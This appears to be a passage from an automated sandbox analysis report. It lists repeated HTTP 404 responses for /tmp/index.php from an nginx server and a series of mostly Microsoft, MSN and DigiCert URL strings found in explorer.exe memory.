/tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:28:13 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:28:14 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:28:15 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:28:16 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:28:17 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:28:18 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:28:19 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:28:20 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:29:26 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:29:28 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:29:29 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:29:31 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:29:32 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:29:38 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:29:43 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:29:48 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:29:53 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:29:59 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:30:05 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:30:12 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:30:20 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:30:20 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:30:27 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:30:33 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:30:39 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:30:45 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:30:51 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:30:57 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:31:04 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:31:09 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Source: explorer.exe, 00000001.00000000.1894676712.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1897951937.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000001.00000000.1894676712.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1897951937.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000001.00000000.1894676712.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1897951937.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000001.00000000.1894676712.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1897951937.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000001.00000000.1894676712.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000001.00000000.1914734952.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.mi
Source: explorer.exe, 00000001.00000000.1914734952.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.micr
Source: explorer.exe, 00000001.00000000.1896371569.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1897161023.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1915165701.0000000009B60000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: explorer.exe, 00000001.00000000.1917493591.000000000C964000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000001.00000000.1894676712.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/Vh5j3k
Source: explorer.exe, 00000001.00000000.1894676712.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/odirmr
Source: explorer.exe, 00000001.00000000.1917493591.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000001.00000000.1897951937.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000001.00000000.1897951937.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/q
Source: explorer.exe, 00000001.00000000.1892315703.0000000001248000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1893438763.0000000003700000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000001.00000000.1897951937.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
Source: explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
Source: explorer.exe, 00000001.00000000.1897951937.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000001.00000000.1897951937.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.comi
Source: explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
Source: explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
Source: explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
Source: explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000001.00000000.1894676712.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
Source: explorer.exe, 00000001.00000000.1894676712.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
Source: explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
Source: explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
Source: explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
Source: explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
Source: explorer.exe, 00000001.00000000.1917493591.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
Source: explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
